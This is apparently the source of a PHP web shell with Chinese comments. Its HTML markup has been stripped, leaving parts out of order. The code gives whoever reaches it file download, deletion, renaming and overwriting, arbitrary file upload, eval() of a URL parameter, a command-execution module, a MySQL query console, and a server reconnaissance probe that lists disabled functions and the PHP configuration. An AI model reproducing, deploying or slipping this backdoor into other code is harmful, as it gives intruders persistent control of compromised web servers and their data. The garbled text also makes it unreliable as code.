Webshell.php '; //这下面$downfile,$delfile,$refilname,$editfile 4个变量是触发下面三个条件语句的变量,值得获取是通过Url取得的。 $downfile=$_GET["downfile"]; $delfile = $_GET["delfile"]; $refilename = $_GET["re
'; //这下面$downfile,$delfile,$refilname,$editfile 4个变量是触发下面三个条件语句的变量,值得获取是通过Url取得的。 $downfile=$_GET["downfile"]; $delfile = $_GET["delfile"]; $refilename = $_GET["refilename"]; $editfile = $_GET["editfile"]; /*echo ''; echo ''; echo ' '; echo ' '; echo ''; echo 'Enter the newname to here:'; echo ''; echo ''; echo ' ';echo '';echo ' '; $oldname=basename($refilename); #rename文件函数,用来对文件进行操作的函数 if (@rename($oldname,$_POST['newname'])){ echo '';} else { if (!empty($_POST['newname'])) echo '';} } //编辑文件 if ($editfile) { $content=basename($editfile); if(empty($_POST['newcontent'])){ echo ' '; echo ''; echo ''; echo ' '; $fp=@fopen("$content","r");#fopen,fread,filesize,fclos,fwrite文件系统函数,用来对文件进行操作的函数 $data=@fread($fp,filesize($content)); echo ' '; echo ' '; } if (!empty($_POST['newcontent'])) { $fp=@fopen("$content","w+"); echo ($result=@fwrite($fp,$_POST['newcontent']))?"The injection document succeeds!Good Luck!":"The injection document is defeated!"; @fclose($fp); } } echo ''; ?>'; print_r($_SERVER);*/ if (!empty($downfile)) { #@set_time_limit(600); #Limits the maximum execution time $filename = basename($downfile); #basename,filesize.readfile文件函数,用来对文件进行操作的函数 header("Content-Type: application/force-download; name=".$filename); #构造一个下载http头部信息。 header("Content-Transfer-Encoding: binary"); header("Content-Disposition: attachment; filename=".$filename); header("Expires: 0"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); } if(!empty($_GET['ed'])) { @$str = htmlspecialchars($_GET['ed']); echo ''; eval(@$str); } //删除文件 if($delfile!=""){ if(is_file($delfile)){ #if_file,unlink文件函数,用来对文件进行操作的函数 $message = (@unlink($delfile)) ? "The deletion document succeeds!`$delfile` Already deleted!" : "The deletion document is defeated!`$delfile` The document exists!" ; }else{ $message = "File `$delfile` does not exist!"; } echo $message; } //重命名文件 if ($refilename){ echo '
'; echo '
操作系统: 服务器名称: Server IP: Server time: Server port :
『PHP探针模块』 『目录浏览模块[快速]』 『命令执行模块』 『数据库操作模块』 『字符转换模块』
Home dir:" rel="nofollow" target="_blank"> Current dir of contents: ".$dir.""; } else { echo "".$dir.""; } ?> $file_size_max) { echo "兄弟!换个小点滴!!
"; exit; } if (file_exists($store_dir ."\\". $upload_file_name) && !$accept_overwrite) { Echo "文件已存在!"; exit; } if (!move_uploaded_file($upload_file,$store_dir."\\".$upload_file_name)) { echo "上传文件失败!"; exit; } Echo "
Uploaded file:"; echo "".$_FILES['upload_file']['name'].""; echo "\t"; Echo "Uploadfilesiza:"; echo "".$_FILES['upload_file']['size']." Bytes"; echo "\t"; Echo "Sucessful..."; } echo '
'; echo ''; echo ' '; ?> 当前目录可写!^ _ ^"; } else{ $dir_wriable='目录不可写'; echo "当前目录不可写!"; } function getinfo($xy7) { if($xy7==1) { $s='YES√'; } else { $s='NO×'; } return $s; } echo ''; echo "服务器系统:" ; echo PHP_OS; echo '
' ; echo "服务器域名:"; echo $_SERVER['SERVER_NAME']; echo '
'; echo "WEB服务器端口:"; echo $_SERVER['SERVER_PORT']; echo '
'; echo "服务器时间:"; echo date("Y年m月d日 h:i:s",time()); echo '
'; echo "服务器IP地址:"; echo gethostbyname($_SERVER['SERVER_NAME']); echo '
'; echo "服务器操作系统文字编码:"; echo $_SERVER['HTTP_ACCEPT_LANGUAGE']; echo '
'; echo "服务器解释引擎:"; echo $_SERVER['SERVER_SOFTWARE']; echo '
'; echo "PHP运行方式:"; echo strtoupper(php_sapi_name()); echo '
'; echo "PHP版本:"; echo PHP_VERSION; echo '
'; echo "ZEND版本:"; echo zend_version(); echo '
'; echo "本文件绝对路径:"; echo __FILE__; echo '
'; echo "服务器剩余空间:"; echo intval(diskfreespace(".") / (1024 * 1024)).'MB'; echo '
'; echo "脚本运行可占最大内存:"; echo get_cfg_var("memory_limit"); echo '
'; echo "脚本上传文件大小限制:"; echo get_cfg_var("upload_max_filesize"); echo '
'; echo "被屏蔽函数:"; echo get_cfg_var("disable_functions"); echo '
'; echo "POST方法提交限制:"; echo get_cfg_var("post_max_size"); echo '
'; echo "脚本超时时间:"; echo get_cfg_var("max_execution_time")."秒"; echo '
'; echo "动态链接库:"; echo getinfo(get_cfg_var("enable_dl")); echo '
'; echo "自定义全局变量:"; echo getinfo(get_cfg_var("register_globals")); echo '
'; echo "显示错误信息:"; echo getinfo(get_cfg_var("display_errors")); echo '
'; echo "PHP安全模式:"; echo getinfo(get_cfg_var("safe_mode")); echo '
'; echo "FTP文件传输:"; echo getinfo(get_magic_quotes_gpc("FTP support")); echo '
'; echo"允许使用URL打开文件:"; echo getinfo(get_cfg_var("allow_url_fopen")); echo '
'; echo "SESSION支持:"; echo getinfo(function_exists("session_start")); echo '
'; echo "Socket支持:"; echo getinfo(function_exists("fsockopen")); echo '
'; echo "MYSQL数据库:"; echo getinfo(function_exists("mysql_close")); echo '
'; echo "SQL SERVER数据库:"; echo getinfo(function_exists("mssql_close")); echo '
'; echo "ODBC数据库:"; echo getinfo(function_exists("odbc_close")); echo '
'; echo "Oracle数据库:"; echo getinfo(function_exists("ora_close")); echo '
'; echo "SNMP协议:"; echo getinfo(function_exists("snmpget")); echo '
'; echo '
'; } elseif ($_GET['shell']=="checkdir"){ global $PHP_SELF; echo ' '; } elseif ($_GET['shell']=="command"){ echo '
'; echo ' '; echo ''; echo ' '; echo ' '; echo 'Enter your command:'; echo ''; echo ''; echo ' ';echo ''; echo ' '; echo ' '; echo ''; } elseif ($_GET['shell']=="change"){ echo ' '; echo ''; } //mysql操作 elseif ($_GET['shell']=="sql"){ echo 'The database connects successfully!
".mysql_error()."
Execution successfully!The request makes a mistake:".mysql_error()." '; echo ' '; echo ' '; echo "Username:"; echo ''; echo ' '; echo ' '; echo "Password:"; echo ''; echo ' '; echo "DBname:"; echo ''; echo ' '; $servername = $_POST['servername']; $username = $_POST['username']; $password = $_POST['password']; $dbname = $_POST['dbname']; if ($link=@mysql_connect($servername,$username,$password) and @mysql_select_db($dbname)) { echo ""; echo ""; //mysql_close(); } else { echo ""; echo ""; } $dbresult = $_POST['query']; if (!empty($dbresult)){ $dbresult = @mysql_query($dbresult); echo ($dbresult) ? "" : " ".""; mysql_close(); } echo ' '; echo ''; echo ' '; echo ' '; echo ''; echo ' '; echo ' '; if(!empty($_GET['url'])) { echo ''; } } ?>